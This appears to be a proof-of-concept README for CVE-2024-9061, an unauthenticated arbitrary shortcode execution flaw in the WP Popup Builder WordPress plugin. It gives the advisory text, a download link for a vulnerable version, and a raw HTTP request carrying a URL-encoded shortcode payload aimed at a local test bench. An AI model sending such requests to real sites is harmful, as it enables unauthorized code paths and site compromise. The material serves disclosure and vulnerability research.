WP Popup Builder – Popup Forms and Marketing Lead Generation <= 1.3.5 - Unauthenticated Arbitrary Shortcode Execution via wp_ajax_nopriv_shortcode_Api_Add# CVE-2024-9061
WP Popup Builder – Popup Forms and Marketing Lead Generation <= 1.3.5 - Unauthenticated Arbitrary Shortcode Execution via wp_ajax_nopriv_shortcode_Api_Add
# Description
The The WP Popup Builder – Popup Forms and Marketing Lead Generation plugin for WordPress is vulnerable to arbitrary shortcode execution via the wp_ajax_nopriv_shortcode_Api_Add AJAX action in all versions up to, and including, 1.3.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. NOTE: This vulnerability was partially fixed in version 1.3.5 with a nonce check, which effectively prevented access to the affected function. However, version 1.3.6 incorporates the correct authorization check to prevent unauthorized access.
I had another plugin installed for php execution for this but never got it to execute.
[xyz-ips snippet="test"]
# Info
```
Type: plugin
CVSS Score: 7.3
CVE: CVE-2024-9061
Slug: wp-popup-builder
Download Link: Download [wp-popup-builder Version 1.3.2](https://downloads.wordpress.org/plugin/wp-popup-builder.1.3.2.zip)
```
POC
---
```
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: wpscan-vulnerability-test-bench.ddev.site
User-Agent: curl/8.7.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 107
Connection: keep-alive
action=shortcode_Api_Add&shortcode=%5b%78%79%7a%2d%69%70%73%20%73%6e%69%70%70%65%74%3d%22%74%65%73%74%22%5d
```
Response is a blank 200
[4.0K] /data/pocs/042209fa54b391fa27db0b50aa8e4600db40dc77
└── [1.5K] README.md
0 directories, 1 file